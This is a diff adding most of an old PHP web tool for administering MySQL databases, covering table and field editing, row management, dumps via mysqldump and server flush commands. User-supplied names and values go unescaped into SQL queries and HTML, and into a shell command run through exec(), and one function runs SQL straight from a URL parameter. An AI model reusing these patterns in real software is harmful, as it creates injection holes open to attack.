+		echo "<h3>Error : $msg</h3><p>\n";
+		return;
+	}
+	$num = mysql_num_rows( $pTable );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$tablename = mysql_tablename( $pTable, $i );
+
+		echo "<tr>\n";
+		echo "<td>\n";
+		echo "$tablename\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+		echo "</td>\n";
+		echo "</tr>\n";
+	}
+
+	echo "</table>";
+}
+
+function createTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+	$queryStr = "CREATE TABLE $tablename ( no INT )";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function dropTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+	$queryStr = "DROP TABLE $tablename";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function viewSchema() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
+
+	echo "<h1>Table Schema</h1>\n";
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echoQueryResult();
+
+	echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
+	echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
+	echo "<hr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+	echo "<tr>\n";
+	echo "<th>Field</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Null</th>\n";
+	echo "<th>Key</th>\n";
+	echo "<th>Default</th>\n";
+	echo "<th>Extra</th>\n";
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		echo "<tr>\n";
+		echo "<td>".$field["Field"]."</td>\n";
+		echo "<td>".$field["Type"]."</td>\n";
+		echo "<td>".$field["Null"]."</td>\n";
+		echo "<td>".$field["Key"]."</td>\n";
+		echo "<td>".$field["Default"]."</td>\n";
+		echo "<td>".$field["Extra"]."</td>\n";
+		$fieldname = $field["Field"];
+		echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Field</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Field</h1>\n";
+		$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+		$num = mysql_num_rows( $pResult );
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_array( $pResult );
+			if( $field["Field"] == $fieldname ) {
+				$fieldtype = $field["Type"];
+				$fieldkey = $field["Key"];
+				$fieldextra = $field["Extra"];
+				$fieldnull = $field["Null"];
+				$fielddefault = $field["Default"];
+				break;
+			}
+		}
+		$type = strtok( $fieldtype, " (,)\n" );
+		if( strpos( $fieldtype, "(" ) ) {
+			if( $type == "enum" | $type == "set" ) {
+				$valuelist = strtok( " ()\n" );
+			} else {
+				$M = strtok( " (,)\n" );
+				if( strpos( $fieldtype, "," ) )
+					$D = strtok( " (,)\n" );
+			}
+		}
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	echo "<form action=$PHP_SELF>\n";
+
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addField_submit>\n";
+	else if( $cmd == "edit" ) {
+		echo "<input type=hidden name=action value=editField_submit>\n";
+		echo "<input type=hidden name=old_name value=$fieldname>\n";
+	}
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+
+	echo "<h3>Name</h3>\n";
+	echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == "tinyint" ) echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == "smallint" ) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == "mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) echo "checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" ) echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == "decimal" ) echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == "datetime" ) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == "timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == "varchar" ) echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == "tinytext" ) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == "mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == "longtext" ) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == "tinyblob" ) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == "mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == "longblob" ) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr> 
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) echo "checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? if( strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( $fielddefault != "" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" <? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Field'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Field'>\n";
+	echo "<input type=button value=Cancel onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
+		$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
+
+	if( $cmd == "add" )
+		$queryStr = "ALTER TABLE $tablename ADD $name ";
+	else if( $cmd == "edit" )
+		$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+	
+	if( $M != "" )
+		if( $D != "" )
+			$queryStr .= "$type($M,$D) ";
+		else
+			$queryStr .= "$type($M) ";
+	else if( $valuelist != "" ) {
+		$valuelist = stripslashes( $valuelist );
+		$queryStr .= "$type($valuelist) ";
+	} else
+		$queryStr .= "$type ";
+
+	$queryStr .= "$unsigned $zerofill $binary ";
+
+	if( $default_value != "" )
+		$queryStr .= "DEFAULT '$default_value' ";
+	
+	$queryStr .= "$not_null $auto_increment";
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	// key change
+	$keyChange = false;
+	$result = mysql_query( "SHOW KEYS FROM $tablename" );
+	$primary = "";
+	while( $row = mysql_fetch_array($result) )
+		if( $row["Key_name"] == "PRIMARY" ) {
+			if( $row[Column_name] == $name )
+				$keyChange = true;
+			else
+				$primary .= ", $row[Column_name]";
+		}
+	if( $primary_key == "PRIMARY KEY" ) {
+		$primary .= ", $name";
+		$keyChange = !$keyChange;
+	}
+	$primary = substr( $primary, 2 );
+	if( $keyChange == true ) {
+		$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+		$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+	}
+
+	viewSchema();
+}
+
+function dropField() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+	$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewSchema();
+}
+
+function viewData( $queryStr ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
+
+	echo "<h1>Data in Table</h1>\n";
+	if( $tablename != "" )
+		echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	else
+		echo "<p class=location>$dbname</p>\n";
+
+	$queryStr = stripslashes( $queryStr );
+	if( $queryStr == "" ) {
+		$queryStr = "SELECT * FROM $tablename";
+		if( $orderby != "" )
+			$queryStr .= " ORDER BY $orderby";
+		echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
+		echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+	}
+
+	$pResult = mysql_db_query( $dbname, $queryStr );
+	$errMsg = mysql_error();
+
+	$GLOBALS[queryStr] = $queryStr;
+
+	if( $pResult == false ) {
+		echoQueryResult();
+		return;
+	}
+	if( $pResult == 1 ) {
+		$errMsg = "Success";
+		echoQueryResult();
+		return;
+	}
+
+	echo "<hr>\n";
+
+	$row = mysql_num_rows( $pResult );
+	$col = mysql_num_fields( $pResult );
+
+	if( $row == 0 ) {
+		echo "No Data Exist!";
+		return;
+	}
+	
+	if( $rowperpage == "" ) $rowperpage = 20;
+	if( $page == "" ) $page = 0;
+	else $page--;
+	mysql_data_seek( $pResult, $page * $rowperpage );
+
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	for( $i = 0; $i < $col; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		echo "<th>";
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+		echo "</th>\n";
+	}
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $rowperpage; $i++ ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		echo "<tr>\n";
+		$key = "";
+		for( $j = 0; $j < $col; $j++ ) {
+			$data = $rowArray[$j];
+
+			$field = mysql_fetch_field( $pResult, $j );
+			if( $field->primary_key == 1 )
+				$key .= "&" . $field->name . "=" . $data;
+
+			if( strlen( $data ) > 20 )
+				$data = substr( $data, 0, 20 ) . "...";
+			$data = htmlspecialchars( $data );
+			echo "<td>\n";
+			echo "$data\n";
+			echo "</td>\n";
+		}
+
+		if( $key == "" )
+			echo "<td colspan=2>no Key</td>\n";
+		else {
+			echo "<td><a href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+			echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+		}
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+
+	echo "<font size=2>\n";
+	echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
+	echo "<font color=green>\n";
+	echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+	echo "</font>\n";
+	echo " | ";
+	if( $page > 0 ) {
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Prev</a>\n";
+	} else
+		echo "Prev";
+	echo " | ";
+	if( $page < ($row/$rowperpage)-1 ) {
+		echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Next</a>\n";
+	} else
+		echo "Next";
+	echo " | ";
+	if( $row > $rowperpage ) {
+		echo "<input type=text size=4 name=page>\n";
+		echo "<input type=submit value='Go'>\n";
+	}
+	echo "</form>\n";
+	echo "</font>\n";
+}
+
+function manageData( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Data</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Data</h1>\n";
+		$pResult = mysql_list_fields( $dbname, $tablename );
+		$num = mysql_num_fields( $pResult );
+	
+		$key = "";
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			if( $field->primary_key == 1 )
+				if( $field->numeric == 1 )
+					$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+				else
+					$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+		}
+		$key = substr( $key, 0, strlen($key)-4 );
+
+		mysql_select_db( $dbname, $mysqlHandle );
+		$pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
+		$data = mysql_fetch_array( $pResult );
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echo "<form action='$PHP_SELF' method=post>\n";
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addData_submit>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=hidden name=action value=editData_submit>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	echo "<th>Name</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Function</th>\n";
+	echo "<th>Data</th>\n";
+	echo "</tr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	$pResultLen = mysql_list_fields( $dbname, $tablename );
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		$fieldname = $field["Field"];
+		$fieldtype = $field["Type"];
+		$len = mysql_field_len( $pResultLen, $i );
+
+		echo "<tr>";
+		echo "<td>$fieldname</td>";
+		echo "<td>".$field["Type"]."</td>";
+		echo "<td>\n";
+		echo "<select name=${fieldname}_function>\n";
+		echo "<option>\n";
+		echo "<option>ASCII\n";
+		echo "<option>CHAR\n";
+		echo "<option>SOUNDEX\n";
+		echo "<option>CURDATE\n";
+		echo "<option>CURTIME\n";
+		echo "<option>FROM_DAYS\n";
+		echo "<option>FROM_UNIXTIME\n";
+		echo "<option>NOW\n";
+		echo "<option>PASSWORD\n";
+		echo "<option>PERIOD_ADD\n";
+		echo "<option>PERIOD_DIFF\n";
+		echo "<option>TO_DAYS\n";
+		echo "<option>USER\n";
+		echo "<option>WEEKDAY\n";
+		echo "<option>RAND\n";
+		echo "</select>\n";
+		echo "</td>\n";
+		$value = htmlspecialchars($data[$i]);
+		if( $cmd == "add" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
+			}
+		} else if( $cmd == "edit" ) {
+			$type = strtok( $fieldtype, " (,)\n" );
+			if( $type == "enum" || $type == "set" ) {
+				echo "<td>\n";
+				if( $type == "enum" )
+					echo "<select name=$fieldname>\n";
+				else if( $type == "set" )
+					echo "<select name=$fieldname size=4 multiple>\n";
+				echo strtok( "'" );
+				while( $str = strtok( "'" ) ) {
+					if( $value == $str )
+						echo "<option selected>$str\n";
+					else
+						echo "<option>$str\n";
+					strtok( "'" );
+				}
+				echo "</select>\n";
+				echo "</td>\n";
+			} else {
+				if( $len < 40 )
+					echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
+				else
+					echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
+			}
+		}
+		echo "</tr>";
+	}
+	echo "</table><p>\n";
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Data'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Data'>\n";
+	echo "<input type=button value='Cancel' onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageData_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	if( $cmd == "add" )
+		$queryStr = "INSERT INTO $tablename VALUES (";
+	else if( $cmd == "edit" )
+		$queryStr = "REPLACE INTO $tablename VALUES (";
+	for( $i = 0; $i < $num-1; $i++ ) {
+		$field = mysql_fetch_field( $pResult );
+		$func = $GLOBALS[$field->name."_function"];
+		if( $func != "" )
+			$queryStr .= " $func(";
+		if( $field->numeric == 1 ) {
+			$queryStr .= $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "),";
+			else
+				$queryStr .= ",";
+		} else {
+			$queryStr .= "'" . $GLOBALS[$field->name];
+			if( $func != "" )
+				$queryStr .= "'),";
+			else
+				$queryStr .= "',";
+		}
+	}
+	$field = mysql_fetch_field( $pResult );
+	if( $field->numeric == 1 )
+		$queryStr .= $GLOBALS[$field->name] . ")";
+	else 
+		$queryStr .= "'" . $GLOBALS[$field->name] . "')";
+
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function deleteData() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
+
+	$pResult = mysql_list_fields( $dbname, $tablename );
+	$num = mysql_num_fields( $pResult );
+
+	$key = "";
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		if( $field->primary_key == 1 )
+			if( $field->numeric == 1 )
+				$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
+			else
+				$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
+	}
+	$key = substr( $key, 0, strlen($key)-4 );
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	$queryStr =  "DELETE FROM $tablename WHERE $key";
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewData( "" );
+}
+
+function dump() {
+	global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename;
+
+	if( $action == "dumpTable" )
+		$filename = $tablename;
+	else
+		$filename = $dbname;
+
+	header("Content-disposition: filename=$filename.sql");
+	header("Content-type: application/octetstream");
+	header("Pragma: no-cache");
+	header("Expires: 0");
+
+	$pResult = mysql_query( "show variables" );
+	while( 1 ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		if( $rowArray[0] == "basedir" )
+			$bindir = $rowArray[1]."bin/";
+	}
+
+	exec( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD $dbname $tablename" );
+}
+
+function utils() {
+	global $PHP_SELF, $command;
+	echo "<h1>Utilities</h1>\n";
+	if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
+		echo "<hr>\n";
+		echo "Show\n";
+		echo "<ul>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
+		echo "</ul>\n";
+		echo "Flush\n";
+		echo "<ul>\n";
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
+		if( $command == "flush_hosts" ) {
+			if( mysql_query( "Flush hosts" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+		if( $command == "flush_logs" ) {
+			if( mysql_query( "Flush logs" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+		if( $command == "flush_privileges" ) {
+			if( mysql_query( "Flush privileges" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+		if( $command == "flush_tables" ) {
+			if( mysql_query( "Flush tables" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+		if( $command == "flush_status" ) {
+			if( mysql_query( "Flush status" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "</ul>\n";
+	} else {
+		$queryStr = ereg_replace( "_", " ", $command );
+		$pResult = mysql_query( $queryStr );
+		if( $pResult == false ) {
+			echo "Fail";
+			return;
+		}
+		$col = mysql_num_fields( $pResult );
+
+		echo "<p class=location>$queryStr</p>\n";
+		echo "<hr>\n";
+
